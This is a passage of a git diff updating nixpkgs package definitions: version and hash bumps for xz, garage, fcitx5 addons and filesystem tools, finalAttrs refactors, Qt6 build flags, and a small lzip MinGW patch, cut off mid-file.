b/nixpkgs/pkgs/tools/cd-dvd/dvd-vr/default.nix @@ -1,10 +1,10 @@ { lib, stdenv, fetchurl }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "dvd-vr"; version = "0.9.7"; src = fetchurl { - url = "https://www.pixelbeat.org/programs/dvd-vr/dvd-vr-${version}.tar.gz"; + url = "https://www.pixelbeat.org/programs/dvd-vr/dvd-vr-${finalAttrs.version}.tar.gz"; sha256 = "13wkdia3c0ryda40b2nzpb9vddimasgc4w95hvl0k555k9k8bl0r"; }; makeFlags = [ "PREFIX=$(out)" ]; @@ -18,4 +18,4 @@ stdenv.mkDerivation rec { mainProgram = "dvd-vr"; }; } - +) diff --git a/nixpkgs/pkgs/tools/compression/heatshrink/default.nix b/nixpkgs/pkgs/tools/compression/heatshrink/default.nix index b5cfb92247af..d18f82ef21fa 100644 --- a/nixpkgs/pkgs/tools/compression/heatshrink/default.nix +++ b/nixpkgs/pkgs/tools/compression/heatshrink/default.nix @@ -5,14 +5,14 @@ , fetchpatch }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "heatshrink"; version = "0.4.1"; src = fetchFromGitHub { owner = "atomicobject"; repo = "heatshrink"; - rev = "v${version}"; + rev = "v${finalAttrs.version}"; hash = "sha256-Nm9/+JFMDXY1N90hmNFGh755V2sXSRQ4VBN9f8TcsGk="; }; @@ -46,4 +46,4 @@ stdenv.mkDerivation rec { platforms = platforms.all; mainProgram = "heatshrink"; }; -} +}) diff --git a/nixpkgs/pkgs/tools/compression/lzip/default.nix b/nixpkgs/pkgs/tools/compression/lzip/default.nix index 3a5d62b8092d..cbf789d1bbf1 100644 --- a/nixpkgs/pkgs/tools/compression/lzip/default.nix +++ b/nixpkgs/pkgs/tools/compression/lzip/default.nix @@ -17,6 +17,9 @@ stdenv.mkDerivation rec { patches = lib.optionals stdenv.hostPlatform.isMinGW [ ./mingw-install-exe-file.patch + # https://lists.nongnu.org/archive/html/lzip-bug/2024-02/msg00015.html + # patch provided by upstream, to be removed in the next release + ./mingw-mkdir-one-argument.patch ]; configureFlags = [ diff --git a/nixpkgs/pkgs/tools/compression/lzip/mingw-mkdir-one-argument.patch b/nixpkgs/pkgs/tools/compression/lzip/mingw-mkdir-one-argument.patch new file mode 100644 index 000000000000..efa0d8e3a067 --- /dev/null +++ b/nixpkgs/pkgs/tools/compression/lzip/mingw-mkdir-one-argument.patch @@ -0,0 +1,13 @@ +--- lzip-1.24/main.cc 2024-01-26 00:08:47.000000000 +0100 ++++ lzip-1.24.1/src/main.cc 2024-02-06 16:04:00.000000000 +0100 +@@ -42,8 +42,10 @@ + #if defined __MSVCRT__ || defined __OS2__ || defined __DJGPP__ + #include <io.h> + #if defined __MSVCRT__ ++#include <direct.h> + #define fchmod(x,y) 0 + #define fchown(x,y,z) 0 ++#define mkdir(name,mode) _mkdir(name) + #define strtoull std::strtoul + #define SIGHUP SIGTERM + #define S_ISSOCK(x) 0 diff --git a/nixpkgs/pkgs/tools/compression/xz/default.nix b/nixpkgs/pkgs/tools/compression/xz/default.nix index e02be74b60d3..2f10236b46b3 100644 --- a/nixpkgs/pkgs/tools/compression/xz/default.nix +++ b/nixpkgs/pkgs/tools/compression/xz/default.nix @@ -11,11 +11,11 @@ stdenv.mkDerivation (finalAttrs: { pname = "xz"; - version = "5.4.6"; + version = "5.6.0"; src = fetchurl { url = with finalAttrs; "https://github.com/tukaani-project/xz/releases/download/v${version}/xz-${version}.tar.bz2"; - sha256 = "sha256-kThRsnTo4dMXgeyUnxwj6NvPDs9uc6JDbcIXad0+b0k="; + hash = "sha256-iMhjHO+6kWZP3EexS7dT4YdvSWSgfbZQgh0gOZKx4eo="; }; strictDeps = true; diff --git a/nixpkgs/pkgs/tools/filesystems/ceph-csi/default.nix b/nixpkgs/pkgs/tools/filesystems/ceph-csi/default.nix index d6b39ef68e4f..7ee65616e0b1 100644 --- a/nixpkgs/pkgs/tools/filesystems/ceph-csi/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/ceph-csi/default.nix @@ -2,7 +2,7 @@ stdenv.mkDerivation rec { pname = "ceph-csi"; - version = "3.10.1"; + version = "3.10.2"; nativeBuildInputs = [ go ]; buildInputs = [ ceph ]; @@ -11,7 +11,7 @@ stdenv.mkDerivation rec { owner = "ceph"; repo = "ceph-csi"; rev = "v${version}"; - sha256 = "sha256-S5jv9l/Oozv0NrEEf+Bik0jnaK4AYIChFm2pU2/DQow="; + sha256 = "sha256-nS5gLe64ubcUatUfPg1f7npLZ90koJcfiDbhidS93/8="; }; preConfigure = '' diff --git a/nixpkgs/pkgs/tools/filesystems/davfs2/default.nix b/nixpkgs/pkgs/tools/filesystems/davfs2/default.nix index a64812e96b9c..529d963af304 100644 --- a/nixpkgs/pkgs/tools/filesystems/davfs2/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/davfs2/default.nix @@ -8,12 +8,12 @@ , wrapperDir ? "/run/wrappers/bin" }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "davfs2"; version = "1.7.0"; src = fetchurl { - url = "mirror://savannah/davfs2/davfs2-${version}.tar.gz"; + url = "mirror://savannah/davfs2/davfs2-${finalAttrs.version}.tar.gz"; sha256 = "sha256-JR23Wic4DMoTMLG5cXAMXl3MDJDlpHYiKF8BQO3+Oi8="; }; @@ -59,4 +59,4 @@ stdenv.mkDerivation rec { platforms = lib.platforms.linux; maintainers = with lib.maintainers; [ fgaz ]; }; -} +}) diff --git a/nixpkgs/pkgs/tools/filesystems/garage/default.nix b/nixpkgs/pkgs/tools/filesystems/garage/default.nix index e34822845b40..520a6951941a 100644 --- a/nixpkgs/pkgs/tools/filesystems/garage/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/garage/default.nix @@ -70,6 +70,11 @@ let "sqlite" ]; + disabledTests = [ + # Upstream told us this test is flakey. + "k2v::poll::test_poll_item" + ]; + passthru.tests = nixosTests.garage; meta = { @@ -89,22 +94,23 @@ rec { # we have to keep all the numbers in the version to handle major/minor/patch level. # for <1.0. - garage_0_8_5 = generic { - version = "0.8.5"; - sha256 = "sha256-YRxkjETSmI1dcHP9qTPLcOMqXx9B2uplVR3bBjJWn3I="; - cargoSha256 = "sha256-VOcymlvqqQRdT1MFzRcMuD+Xo3fc3XTuRA12tW7ZjdI="; + garage_0_8_7 = generic { + version = "0.8.7"; + sha256 = "sha256-2QGbR6YvMQeMxN3n1MMJ5qfBcEJ5hjXARUOfEn+m4Jc="; + cargoSha256 = "sha256-Q0QyBNPEDrlhgIHD4q7Qb1Pu3xBvzlLOSW7LSWWdoIo="; broken = stdenv.isDarwin; }; - garage_0_8 = garage_0_8_5; + garage_0_8 = garage_0_8_7; - garage_0_9_1 = generic { - version = "0.9.1"; - sha256 = "sha256-AXLaifVmZU4j5D/wKn/0TzhjHZBzZW1+tMyhsAo2eBU="; - cargoSha256 = "sha256-4/+OsM73TroBB1TGqare2xASO5KhqVyNkkss0Y0JZXg="; + garage_0_9_3 = generic { + version = "0.9.3"; + sha256 = "sha256-NN2HoheSW2+SAFX71K12KTe0wpaBEwkwxvZDi0Bdx+8="; + cargoSha256 = "sha256-OabgWVMkccFFAtBHEf3z+MRVcWaO+NCk/pumEqdNNRs="; + broken = stdenv.isDarwin; }; - garage_0_9 = garage_0_9_1; + garage_0_9 = garage_0_9_3; garage = garage_0_9; } diff --git a/nixpkgs/pkgs/tools/filesystems/mergerfs/default.nix b/nixpkgs/pkgs/tools/filesystems/mergerfs/default.nix index 1ff360bc3399..c5dca0278ecb 100644 --- a/nixpkgs/pkgs/tools/filesystems/mergerfs/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/mergerfs/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "mergerfs"; - version = "2.40.1"; + version = "2.40.2"; src = fetchFromGitHub { owner = "trapexit"; repo = pname; rev = version; - sha256 = "sha256-EeAgDkm8WyD9OCM8/tHydp/slDGPwCAljeOrUCIWAqQ="; + sha256 = "sha256-3DfSGuTtM+h0IdtsIhLVXQxX5/Tj9G5Qcha3DWmyyq4="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/filesystems/nilfs-utils/default.nix b/nixpkgs/pkgs/tools/filesystems/nilfs-utils/default.nix index 5f3b5e534ca3..ae96def578f6 100644 --- a/nixpkgs/pkgs/tools/filesystems/nilfs-utils/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/nilfs-utils/default.nix @@ -3,13 +3,13 @@ stdenv.mkDerivation rec { pname = "nilfs-utils"; - version = "2.2.9"; + version = "2.2.10"; src = fetchFromGitHub { owner = "nilfs-dev"; repo = pname; rev = "v${version}"; - sha256 = "sha256-XqViUvPj2BHO3bGs9xBO3VpRq9XqnwBptHvMwBOntqo="; + sha256 = "sha256-xTnd3sfBaVU4Ovcsk4oufylNpGS+5n3ZLa2GXzUbeCE="; }; nativeBuildInputs = [ autoreconfHook ]; diff --git a/nixpkgs/pkgs/tools/filesystems/s3fs/default.nix b/nixpkgs/pkgs/tools/filesystems/s3fs/default.nix index 88f2f8a08771..6ca298dc0794 100644 --- a/nixpkgs/pkgs/tools/filesystems/s3fs/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/s3fs/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "s3fs-fuse"; - version = "1.93"; + version = "1.94"; src = fetchFromGitHub { owner = "s3fs-fuse"; repo = "s3fs-fuse"; rev = "v${version}"; - sha256 = "sha256-7rLHnQlyJDOn/RikOrrEAQ7O+4T+26vNGiTkOgNH75Q="; + sha256 = "sha256-90udqj+/U0SL8baEE06UawZGoIqcUEdiAGiPYpbRmHs="; }; buildInputs = [ curl openssl libxml2 fuse ]; diff --git a/nixpkgs/pkgs/tools/filesystems/squashfuse/default.nix b/nixpkgs/pkgs/tools/filesystems/squashfuse/default.nix index c1c374ac0340..71a25ef88b3f 100644 --- a/nixpkgs/pkgs/tools/filesystems/squashfuse/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/squashfuse/default.nix @@ -4,13 +4,13 @@ stdenv.mkDerivation rec { pname = "squashfuse"; - version = "0.5.0"; + version = "0.5.2"; src = fetchFromGitHub { owner = "vasi"; repo = pname; rev = version; - sha256 = "sha256-nCdAO5WPYt/aHdNnfkIJqz0T59COgsSGeXho4bFZVTY="; + sha256 = "sha256-76PQB+6ls/RCjEP8Z4DEtX0xemN3srCsLM7DsDqiTVA="; }; nativeBuildInputs = [ autoreconfHook libtool pkg-config ]; diff --git a/nixpkgs/pkgs/tools/filesystems/ssdfs-utils/default.nix b/nixpkgs/pkgs/tools/filesystems/ssdfs-utils/default.nix index 46d2c8ed9293..b4bd62b8b1b5 100644 --- a/nixpkgs/pkgs/tools/filesystems/ssdfs-utils/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/ssdfs-utils/default.nix @@ -12,13 +12,13 @@ stdenv.mkDerivation { # as ssdfs-utils, not ssdfs-tools. pname = "ssdfs-utils"; # The version is taken from `configure.ac`, there are no tags. - version = "4.38"; + version = "4.39"; src = fetchFromGitHub { owner = "dubeyko"; repo = "ssdfs-tools"; - rev = "14c0e9eb63f75c100a711493a16665c313c7bcf7"; - hash = "sha256-s8HWuUub7EzDVZTFSitW/Zg2u0PSrXnmb5fnfOyrNL0="; + rev = "24aafdd9ee30247745b36e55e0098fa590ffc26f"; + hash = "sha256-e6Duur7EauvzK1aStbRzClfPMGRR2a7jxGpiyJfQaUk="; }; strictDeps = true; diff --git a/nixpkgs/pkgs/tools/filesystems/xfsprogs/default.nix b/nixpkgs/pkgs/tools/filesystems/xfsprogs/default.nix index c8c80e5ff777..5a7022ee6a13 100644 --- a/nixpkgs/pkgs/tools/filesystems/xfsprogs/default.nix +++ b/nixpkgs/pkgs/tools/filesystems/xfsprogs/default.nix @@ -58,6 +58,6 @@ stdenv.mkDerivation rec { description = "SGI XFS utilities"; license = with licenses; [ gpl2Only lgpl21 gpl3Plus ]; # see https://git.kernel.org/pub/scm/fs/xfs/xfsprogs-dev.git/tree/debian/copyright platforms = platforms.linux; - maintainers = with maintainers; [ dezgeg ] ++ teams.helsinki-systems.members; + maintainers = with maintainers; [ dezgeg ajs124 ] ++ teams.helsinki-systems.members; }; } diff --git a/nixpkgs/pkgs/tools/graphics/pikchr/default.nix b/nixpkgs/pkgs/tools/graphics/pikchr/default.nix index 3216790590e1..8c3e603cae84 100644 --- a/nixpkgs/pkgs/tools/graphics/pikchr/default.nix +++ b/nixpkgs/pkgs/tools/graphics/pikchr/default.nix @@ -9,12 +9,12 @@ stdenv.mkDerivation { pname = "pikchr"; # To update, use the last check-in in https://pikchr.org/home/timeline?r=trunk - version = "unstable-2023-08-30"; + version = "0-unstable-2024-02-12"; src = fetchfossil { url = "https://pikchr.org/home"; - rev = "d6f80b1ab30654d5"; - sha256 = "sha256-GEH1qFiMYmNFJnZzLG5rxpl+F7OSRMoVcdo94+mvrlY="; + rev = "ae3317b0ec2e635c"; + hash = "sha256-kCbd6XAaUCwFVYOPPLIux7wW62KRfVnfaxT8Z1RGFfc="; }; # can't open generated html files diff --git a/nixpkgs/pkgs/tools/graphics/svg2pdf/default.nix b/nixpkgs/pkgs/tools/graphics/svg2pdf/default.nix index 24065574ddcc..851f359fdf80 100644 --- a/nixpkgs/pkgs/tools/graphics/svg2pdf/default.nix +++ b/nixpkgs/pkgs/tools/graphics/svg2pdf/default.nix @@ -5,16 +5,16 @@ rustPlatform.buildRustPackage rec { pname = "svg2pdf"; - version = "0.9.1"; + version = "0.10.0"; src = fetchFromGitHub { owner = "typst"; repo = "svg2pdf"; rev = "v${version}"; - hash = "sha256-mWj9zWxqcJ+5VFYSaeNLxClWdOGd34JboZBwT8E75Ew="; + hash = "sha256-4gCEm/E7lzd6pLyJnEEswtpZ45cCxAaHMxOWMY0I2Y8="; }; - cargoHash = "sha256-zP448dFnkoPca/GJA2kT5ht1fVGkWN0XdaKEePJaloQ="; + cargoHash = "sha256-PBnOGXV9Q9BMxhzx/xs2hXsy0wzcCvrspee6M4WxqX0="; cargoBuildFlags = [ "-p=svg2pdf-cli" diff --git a/nixpkgs/pkgs/tools/graphics/welkin/default.nix b/nixpkgs/pkgs/tools/graphics/welkin/default.nix index 111abc745be5..e825f5e5d2b8 100644 --- a/nixpkgs/pkgs/tools/graphics/welkin/default.nix +++ b/nixpkgs/pkgs/tools/graphics/welkin/default.nix @@ -32,7 +32,7 @@ stdenv.mkDerivation rec { ]; hydraPlatforms = []; sourceProvenance = with lib.sourceTypes; [ binaryBytecode ]; - license = lib.licenses.free; + license = lib.licenses.bsd3; platforms = with lib.platforms; unix; }; } diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/default.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/default.nix index a3b5e180bcfb..865134947be5 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/default.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/default.nix @@ -44,13 +44,13 @@ let in stdenv.mkDerivation rec { pname = "fcitx5"; - version = "5.1.7"; + version = "5.1.8"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - hash = "sha256-XI4E+fWDIYDiYBv6HezytaZmhzv4NUaNam1T5Fyx+LI="; + hash = "sha256-MeknggrpOzpkT1EXZCftIrlevuMEEHM5d8vszKRp+DI="; }; prePatch = '' diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-chinese-addons.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-chinese-addons.nix index 385043ef9a29..0699f23e3aab 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-chinese-addons.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-chinese-addons.nix @@ -1,5 +1,5 @@ { lib -, mkDerivation +, stdenv , fetchurl , fetchFromGitHub , cmake @@ -13,6 +13,7 @@ , opencc , curl , fmt +, qtbase , luaSupport ? true }: @@ -29,15 +30,15 @@ let }; in -mkDerivation rec { +stdenv.mkDerivation rec { pname = "fcitx5-chinese-addons"; - version = "5.1.3"; + version = "5.1.4"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-z+udRjvAZbnu6EcvvdaFVCr0OKLxFBJbgoYpH9QjrDI="; + sha256 = "sha256-OqVoXZ8SIO8KRs3ehxul9Ug4sV47cxVCbLCBh6/8EoE="; }; nativeBuildInputs = [ @@ -62,6 +63,12 @@ mkDerivation rec { fmt ] ++ lib.optional luaSupport fcitx5-lua; + cmakeFlags = [ + (lib.cmakeBool "USE_QT6" (lib.versions.major qtbase.version == "6")) + ]; + + dontWrapQtApps = true; + meta = with lib; { description = "Addons related to Chinese, including IME previous bundled inside fcitx4"; homepage = "https://github.com/fcitx/fcitx5-chinese-addons"; diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-configtool.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-configtool.nix index b726a3515508..f0553a5d52f7 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-configtool.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-configtool.nix @@ -1,60 +1,81 @@ { lib -, mkDerivation +, stdenv , fetchFromGitHub , cmake , extra-cmake-modules +, pkg-config , fcitx5 , fcitx5-qt -, qtx11extras -, qtquickcontrols2 +, qtbase +, qtsvg +, qtwayland +, qtdeclarative +, qtx11extras ? null +, kitemviews , kwidgetsaddons +, qtquickcontrols2 ? null +, kcoreaddons , kdeclarative -, kirigami2 +, kirigami ? null +, kirigami2 ? null , isocodes , xkeyboardconfig , libxkbfile -, libXdmcp -, plasma5Packages -, plasma-framework +, libplasma ? null +, plasma-framework ? null +, wrapQtAppsHook , kcmSupport ? true }: -mkDerivation rec { +stdenv.mkDerivation rec { pname = "fcitx5-configtool"; - version = "5.1.3"; + version = "5.1.4"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-IwGlhIeON0SenW738p07LWZAzVDMtxOSMuUIAgfmTEg="; + sha256 = "sha256-jYO1jdiuDjt6e98qhwMpTQTnGxoIYWMKkORGJbmk3mk="; }; cmakeFlags = [ - "-DKDE_INSTALL_USE_QT_SYS_PATHS=ON" + (lib.cmakeBool "KDE_INSTALL_USE_QT_SYS_PATHS" true) + (lib.cmakeBool "ENABLE_KCM" kcmSupport) + (lib.cmakeBool "USE_QT6" (lib.versions.major qtbase.version == "6")) ]; nativeBuildInputs = [ cmake extra-cmake-modules + pkg-config + wrapQtAppsHook ]; buildInputs = [ fcitx5 fcitx5-qt - qtx11extras - qtquickcontrols2 - kirigami2 + qtbase + qtsvg + qtwayland + kitemviews + kwidgetsaddons isocodes xkeyboardconfig libxkbfile - libXdmcp - ] ++ lib.optionals kcmSupport [ + ] ++ lib.optionals (lib.versions.major qtbase.version == "5") [ + qtx11extras + ] ++ lib.optionals kcmSupport ([ + qtdeclarative + kcoreaddons kdeclarative - kwidgetsaddons - plasma5Packages.kiconthemes + ] ++ lib.optionals (lib.versions.major qtbase.version == "5") [ + qtquickcontrols2 plasma-framework - ]; + kirigami2 + ] ++ lib.optionals (lib.versions.major qtbase.version == "6") [ + libplasma + kirigami + ]); meta = with lib; { description = "Configuration Tool for Fcitx5"; diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-gtk.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-gtk.nix index 1036b28685c3..6be9e49886f8 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-gtk.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-gtk.nix @@ -26,13 +26,13 @@ stdenv.mkDerivation rec { pname = "fcitx5-gtk"; - version = "5.1.1"; + version = "5.1.2"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-Ex24cHTsYsZjP8o+vrCdgGogk1UotWpd8xaLZAqzgaQ="; + sha256 = "sha256-iNqY/VORDEPR4rc0LjVgcojZlMcT+LBdrdOwBkC5Vkk="; }; outputs = [ "out" "dev" ]; diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-hangul.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-hangul.nix index 9a1a2c8eca24..23aabde1e653 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-hangul.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-hangul.nix @@ -11,13 +11,13 @@ stdenv.mkDerivation rec { pname = "fcitx5-hangul"; - version = "5.1.1"; + version = "5.1.2"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-3gkZh+ZzgTdpTbQe92gxJlG0x6Yhl7LfMiFEq5mb92o="; + sha256 = "sha256-S5TGjb5vD0rk7V88b4yRziszLrwO1pgVFWuEGMp48oY="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-qt.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-qt.nix index 5311d20ffa32..b0cd6dc6d59b 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-qt.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-qt.nix @@ -18,7 +18,7 @@ stdenv.mkDerivation rec { src = fetchFromGitHub { owner = "fcitx"; - repo = pname; + repo = "fcitx5-qt"; rev = version; sha256 = "sha256-bVH2US/uEZGERslnAh/fyUbzR9fK1UfG4J+mOmrIE8Y="; }; diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-rime.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-rime.nix index 3698abeed8aa..4fecf46e5e3b 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-rime.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-rime.nix @@ -14,11 +14,11 @@ stdenv.mkDerivation rec { pname = "fcitx5-rime"; - version = "5.1.4"; + version = "5.1.5"; src = fetchurl { url = "https://download.fcitx-im.org/fcitx5/${pname}/${pname}-${version}.tar.xz"; - hash = "sha256-tbCIWenH5brJUVIsmOiw/E/uIXAWwK1yangIVlkeOAs="; + hash = "sha256-/eVgF5kgf1gmbkOInoGbmH/eH0vO2xj3X6k+wzeEssM="; }; cmakeFlags = [ diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-skk.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-skk.nix index 31ecbed35bc9..6cfced6a632e 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-skk.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-skk.nix @@ -10,19 +10,18 @@ , libskk , qtbase , skk-dicts -, wrapQtAppsHook , enableQt ? false }: stdenv.mkDerivation rec { pname = "fcitx5-skk"; - version = "5.1.1"; + version = "5.1.2"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-a+ZsuFEan61U0oOuhrTFoK5J4Vd0jj463jQ8Mk7TdbA="; + sha256 = "sha256-vg79zJ/ZoUjCKU11krDUjO0rAyZxDMsBnHqJ/I6NTTA="; }; nativeBuildInputs = [ @@ -30,7 +29,7 @@ stdenv.mkDerivation rec { extra-cmake-modules gettext pkg-config - ] ++ lib.optional enableQt wrapQtAppsHook; + ]; buildInputs = [ fcitx5 @@ -41,10 +40,13 @@ stdenv.mkDerivation rec { ]; cmakeFlags = [ - "-DENABLE_QT=${toString enableQt}" + (lib.cmakeBool "ENABLE_QT" enableQt) + (lib.cmakeBool "USE_QT6" (lib.versions.major qtbase.version == "6")) "-DSKK_DEFAULT_PATH=${skk-dicts}/share/SKK-JISYO.L" ]; + dontWrapQtApps = true; + meta = with lib; { description = "Input method engine for Fcitx5, which uses libskk as its backend"; homepage = "https://github.com/fcitx/fcitx5-skk"; diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-extra.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-extra.nix index 0320fa5c4f01..dea3e2d03802 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-extra.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-extra.nix @@ -10,13 +10,13 @@ stdenv.mkDerivation rec { pname = "fcitx5-table-extra"; - version = "5.1.3"; + version = "5.1.4"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - hash = "sha256-w4JFZvYFL3fHrDgZqYND2bl3lT9/O1GXgfOwR7WyzWY="; + hash = "sha256-Lb8CYFQl48arJEn9gemZ7imD/gdKjN+7Wnm21/0/Sko="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-other.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-other.nix index b0129a923438..410413bf30d8 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-other.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-table-other.nix @@ -10,13 +10,13 @@ stdenv.mkDerivation rec { pname = "fcitx5-table-other"; - version = "5.1.0"; + version = "5.1.1"; src = fetchFromGitHub { owner = "fcitx"; repo = pname; rev = version; - sha256 = "sha256-ymHAKaPmQckxM/XHoDOVSzEWpyQGb7zVG21CDwNfyjg="; + sha256 = "sha256-G34hPEdcdi5agWiFEgUHWD18ozOgBCaoS6HMAklUcO4="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-unikey.nix b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-unikey.nix index aa87d725f104..a1a077264b3a 100644 --- a/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-unikey.nix +++ b/nixpkgs/pkgs/tools/inputmethods/fcitx5/fcitx5-unikey.nix @@ -6,23 +6,37 @@ , fcitx5 , fcitx5-qt , gettext -, wrapQtAppsHook +, qtbase }: stdenv.mkDerivation rec { pname = "fcitx5-unikey"; - version = "5.1.2"; + version = "5.1.3"; src = fetchFromGitHub { owner = "fcitx"; repo = "fcitx5-unikey"; rev = version; - sha256 = "sha256-tLooADS8HojS9i178i5FJVqZtKrTXlzOBPlE9K49Tjc="; + sha256 = "sha256-wrsA0gSexOZgsJunozt49GyP9R3Xe2Aci7Q8p3zAM9Q="; }; - nativeBuildInputs = [ cmake extra-cmake-modules wrapQtAppsHook ]; + nativeBuildInputs = [ + cmake + extra-cmake-modules + ]; - buildInputs = [ fcitx5 fcitx5-qt gettext ]; + buildInputs = [ + qtbase + fcitx5 + fcitx5-qt + gettext + ]; + + cmakeFlags = [ + (lib.cmakeBool "USE_QT6" (lib.versions.major qtbase.version == "6")) + ]; + + dontWrapQtApps = true; meta = with lib; { description = "Unikey engine support for Fcitx5"; diff --git a/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-m17n/default.nix b/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-m17n/default.nix index eea671dc7b55..2509659cf8ef 100644 --- a/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-m17n/default.nix +++ b/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-m17n/default.nix @@ -13,13 +13,13 @@ stdenv.mkDerivation rec { pname = "ibus-m17n"; - version = "1.4.27"; + version = "1.4.28"; src = fetchFromGitHub { owner = "ibus"; repo = "ibus-m17n"; rev = version; - sha256 = "sha256-A8XxmYEi7OuJk1BhXCtk/hx5/JOqg2sJ6yE9gzaTRNA="; + sha256 = "sha256-3/AnytPIIi1Q2i/25rkqOZWgUCtouO+cS+TByp9neOI="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-typing-booster/default.nix b/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-typing-booster/default.nix index 3c05cc5cf06c..47262be28d5c 100644 --- a/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-typing-booster/default.nix +++ b/nixpkgs/pkgs/tools/inputmethods/ibus-engines/ibus-typing-booster/default.nix @@ -13,13 +13,13 @@ in stdenv.mkDerivation rec { pname = "ibus-typing-booster"; - version = "2.25.1"; + version = "2.25.3"; src = fetchFromGitHub { owner = "mike-fabian"; repo = "ibus-typing-booster"; rev = version; - hash = "sha256-/FmmcEDmN03+lE3+nmIk8PCnpjQMFQBPtijSYiAfCmk="; + hash = "sha256-5WQTJdGKEp231r5vibbNEOPLoLFz7Scnq65FiVar5kY="; }; nativeBuildInputs = [ autoreconfHook pkg-config wrapGAppsHook gobject-introspection ]; diff --git a/nixpkgs/pkgs/tools/inputmethods/unnaturalscrollwheels/default.nix b/nixpkgs/pkgs/tools/inputmethods/unnaturalscrollwheels/default.nix index b28b7ad784f8..6337b0d7f4f5 100644 --- a/nixpkgs/pkgs/tools/inputmethods/unnaturalscrollwheels/default.nix +++ b/nixpkgs/pkgs/tools/inputmethods/unnaturalscrollwheels/default.nix @@ -15,7 +15,6 @@ stdenvNoCC.mkDerivation (finalAttrs: { # APFS format is unsupported by undmg nativeBuildInputs = [ _7zz ]; - unpackCmd = "7zz x $curSrc"; installPhase = '' runHook preInstall diff --git a/nixpkgs/pkgs/tools/misc/aichat/default.nix b/nixpkgs/pkgs/tools/misc/aichat/default.nix index 3a35cb888497..311d0fb8de87 100644 --- a/nixpkgs/pkgs/tools/misc/aichat/default.nix +++ 